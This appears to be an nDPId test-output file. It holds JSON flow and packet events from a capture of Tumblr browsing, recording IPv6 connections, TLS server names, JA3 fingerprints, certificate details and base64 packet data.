{"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01286{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23427,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605292121486,"flow_last_seen":1605292121698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1605292121698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","server_names":"*.tumblr.com,tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tumblr.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:78:BA:5B:B5:54:5D:A1:2C:D2:79:4C:42:99:BB:3A:A9:DB:86:C2"}} 
-00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605292121698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121698,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgXAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbvZCJmV\/O79d79\/gBALlo7gAAABAQgKwt3eUxu5BaQ="} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122064,"flow_last_seen":1605292122064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605292122064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122064,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGkAAAAAoAL9IOE8AAACBAWgBAIICthbOh0AAAAAAQMDBw=="} 
-00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23633,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605292122076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":172,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":172,"pkt_l4_len":118,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAHYGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2Qd9sejoTgBgk6QsuAAABAQgKJEeQFMLc4vQXAwMAUQAAAAAAAAAPN+72C7wfHoQtmaJB3aOHKjPk6JlEWLNjF5TOq7HiJ1O2KSnCxtEIEQAeO4GmbeSTOkkpawAah7BKsajx09L6L57ZkTTcEWLCJA=="} -00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23634,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605292122076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAE4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2QjVsejoTgBgk6YPXAAABAQgKJEeQFMLc4vQXAwMAKQAAAAAAAAAQ4G\/3mQ3kGgQra1eBqPYCTvM1QPmaUoG2gBnwdZPdmFLU"} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23650,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605292122094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122094,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBjCTTL5FAHmhqoBJXgI\/cAAACBAV4AQMDAwQCCArC3d\/Z2Fs6HQ=="} 
-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23654,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605292122094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122094,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGok0y+SgBAB+xPQAAABAQgK2Fs6O8Ld39k="} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122064,"flow_last_seen":1605292122094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122094,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122095,"flow_last_seen":1605292122095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122095,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605292122095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122095,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5CzgAAAAAoAL9IPiAAAACBAWgBAIIChLBJ8gAAAAAAQMDBw=="} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24118,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605292122163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122163,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuW0O3zbp+IuQs5oBJXgJ7NAAACBAV4AQMDAwQCCArC3d\/9EsEnyA=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24126,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605292122163,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122163,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5Cznt826ggBAB+yKbAAABAQgKEsEoDMLd3\/0="} 
-00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122095,"flow_last_seen":1605292122163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122163,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24239,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122064,"flow_last_seen":1605292122177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122095,"flow_last_seen":1605292122212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24626,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605292122439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":203,"pkt_l4_len":149,"thread_ts_msec":1605292122439,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRAJUGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v3+ZlfzugBgB9aL3AAABAQgKG7m5ccLd3lMXAwMAcFVxaXihuhejZCNpZ5nuv6bEN9Yj5XMBxAt2QHwyRgmT6ybDwC5C73DyglYgxmIhMzt282zpUtE5GphT7ONBXskP6qssi1eNQHysgmBFeTvR+6kSeL0yhYhtFPIEYfWd8KPo3wOHIQIgFNXMNqMrZ9Q="} 
-00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605292122501,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":149,"pkt_l4_len":95,"thread_ts_msec":1605292122501,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMAF8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoadXXNVgBgB9QaPAAABAQgKTYUvYcLdm\/0XAwMAOgAAAAAAAAAIvZM7k4G8cjK7Q9\/YrVI4eMbPvi74lWEwjtUtgcQJsZEKgX5x1KPe5+ARIWOSp6YRK8o="} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122674,"flow_last_seen":1605292122674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605292122674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122674,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9u8AAAAAoAL9IJXTAAACBAWgBAIIChNnJ60AAAAAAQMDBw=="} 
-00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24691,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605292122697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY\/FghbGM8FfbwoBJXgNHxAAACBAV4AQMDAwQCCArC3eI6E2cnrQ=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24692,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9vBYIWxkgBAB+1XrAAABAQgKE2cnxcLd4jo="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24693,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122674,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122698,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605292122698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gCuvGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoVprIBu3ASIMYXhL6qgBAB9S93AAABAQgKNSTnjcLdLMU="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24706,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605292122741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122741,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAEpymhUqAcsBIEmLB5kd7IUo3\/YpAbumsheEvqpwEiDHgBALdyXtAAABAQgKwt3iZjUkMfM="} 
-00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24707,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122674,"flow_last_seen":1605292122755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292122755,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122874,"flow_last_seen":1605292122874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122874,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605292122874,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122874,"pkt":"qtsDr8lk5EKm5WPyht1gDJQ7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnP4Bu4CgSN\/gvLosgBAB9qrlAAABAQgK1OQQnsLdMvM="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605292122899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122899,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuc\/uC8uiyAoEjggBALQrp6AAABAQgKwt3jAtThR68="} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118714,"flow_last_seen":1605292118786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118714,"flow_last_seen":1605292118786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00691{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 